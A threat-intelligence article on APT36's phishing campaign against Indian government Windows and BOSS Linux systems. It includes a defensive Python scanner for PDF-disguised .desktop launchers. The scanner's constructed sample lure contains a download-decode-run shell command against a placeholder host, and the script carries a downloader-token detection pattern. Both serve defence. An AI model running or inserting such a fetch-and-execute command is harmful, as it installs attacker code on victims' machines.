
Transparent Tribe Expands Attacks to Target Windows and Linux BOSS Systems


The advanced persistent threat (APT) group known as Transparent Tribe (APT36) has been observed expanding its cyber operations to target both Windows and Bharat Operating System Solutions (BOSS) Linux platforms. This marks a significant step in the group’s evolution, showcasing its ability to adapt and diversify attack methods against Indian government entities.

Initial Access and Attack Vectors

According to cybersecurity firm CYFIRMA, the group primarily leverages spear-phishing emails as the initial entry point.

  • Windows Environments: Targeted with malicious files disguised as legitimate documents.

  • Linux BOSS Systems: Exploited using weaponized .desktop shortcut files, which masquerade as PDFs. Once opened, these files launch shell scripts designed to download and execute payloads from attacker-controlled servers.

The phishing lures often pose as meeting invitations, such as "Meeting_Ltr_ID1543ops.pdf.desktop", crafted to trick recipients into opening them.

Technical Breakdown of the Malware

Once executed, the malicious desktop file initiates a multi-stage attack chain:

  1. Shell Script Execution: Downloads a hex-encoded file from a remote server (securestore[.]cv) and saves it as an ELF binary.

  2. Decoy Display: Opens a fake PDF from Google Drive to reduce suspicion.

  3. Payload Deployment: A Go-based binary communicates with a command-and-control (C2) server (modgovindia[.]space:4000).

  4. Persistence Mechanism: Installs a cron job to ensure the malware restarts after reboot.

The payload, identified as the Poseidon backdoor, enables data collection, credential harvesting, system reconnaissance, and long-term remote access.
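The lure described above relies on a .desktop launcher that looks like a PDF while its Exec= line runs a download-and-execute shell command. The following triage helper is an added example for defenders (not code from CYFIRMA or from the campaign) that flags that pattern in .desktop files; the two sample entries, the host example.invalid and the staging path are constructed for illustration.

```python
"""Heuristic triage of .desktop files for document-masquerade launchers."""
import re
import configparser
from pathlib import Path

# Constructed sample modelled on the lure pattern: PDF-like name and icon,
# shell downloader in Exec=. Host and paths are placeholders, not real IoCs.
SAMPLE_LURE = """[Desktop Entry]
Type=Application
Name=Meeting_Ltr_ID1543ops.pdf
Icon=application-pdf
Exec=bash -c "curl -fsSL http://example.invalid/stage | xxd -r -p > /tmp/x; chmod +x /tmp/x; /tmp/x &"
Terminal=false
"""

# Constructed benign launcher for comparison.
SAMPLE_BENIGN = """[Desktop Entry]
Type=Application
Name=Text Editor
Icon=accessories-text-editor
Exec=gedit %U
"""

# Tokens typical of a download-decode-run one-liner inside Exec=.
DOWNLOADER = re.compile(r"\b(curl|wget|xxd|base64|chmod\s+\+x|bash\s+-c|sh\s+-c)\b")
SHELL_EXEC = re.compile(r"\s*(/bin/|/usr/bin/)?(ba)?sh\b")

def triage_desktop_entry(filename: str, content: str) -> list[str]:
    """Return human-readable findings for one .desktop file; empty list means clean."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(content)
    if not cp.has_section("Desktop Entry"):
        return []
    entry = cp["Desktop Entry"]
    name, icon, exec_line = entry.get("Name", ""), entry.get("Icon", ""), entry.get("Exec", "")
    findings = []
    if filename.lower().endswith(".pdf.desktop") or name.lower().endswith(".pdf"):
        findings.append("double extension: launcher named like a PDF document")
    if "pdf" in icon.lower() and SHELL_EXEC.match(exec_line):
        findings.append("PDF icon on a launcher whose Exec= is a shell interpreter")
    hits = sorted({m.group(1).split()[0] for m in DOWNLOADER.finditer(exec_line)})
    if hits:
        findings.append("downloader tokens in Exec=: " + ", ".join(hits))
    return findings

def scan_directory(root: str) -> dict[str, list[str]]:
    """Triage every .desktop file under root (e.g. ~/Downloads, ~/Desktop)."""
    results = {}
    for path in Path(root).expanduser().rglob("*.desktop"):
        findings = triage_desktop_entry(path.name, path.read_text(errors="replace"))
        if findings:
            results[str(path)] = findings
    return results
```

Pair this with a review of user crontabs and /etc/cron.* entries, since the page notes the payload installs a cron job for persistence after reboot.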

Anti-Analysis and Evasion

The malware is engineered with anti-debugging and sandbox evasion checks. By performing dummy operations, it complicates analysis and reduces detection rates, making it a resilient tool for long-term campaigns.

Broader Campaign and Objectives

Transparent Tribe’s operations are not limited to malware deployment.

  • Credential Theft: Spoofed domains are used to harvest government logins and even bypass Kavach, a two-factor authentication system used by Indian agencies.

  • Infrastructure Control: By customizing payloads for different operating systems, APT36 increases its ability to persist inside sensitive environments.

  • Regional Targeting: While India is the primary focus, related campaigns attributed to South Asian APT groups (like SideWinder) have also been observed striking neighboring countries such as Bangladesh, Nepal, and Sri Lanka.

Significance of the Findings

The campaign highlights several critical takeaways:

  • Dual-Platform Targeting: APT36’s ability to attack both Windows and Linux shows a higher degree of sophistication.

  • Persistent Threat: By using decoys, custom binaries, and cron jobs, the malware ensures long-term access.

  • National Security Risk: Compromise of government systems can lead to exfiltration of classified data, disruption of critical operations, and potential lateral movement across agencies.

Conclusion

The latest Transparent Tribe operations demonstrate the group’s adaptability and persistence in pursuing Indian government entities. By exploiting both Windows and BOSS Linux systems, APT36 is reinforcing its long-standing strategy of targeting critical infrastructure while adopting new tactics to stay ahead of defensive measures.

The findings underline the importance of enhanced phishing awareness, stricter endpoint security controls, and proactive monitoring of government systems to detect and mitigate such state-aligned cyber threats.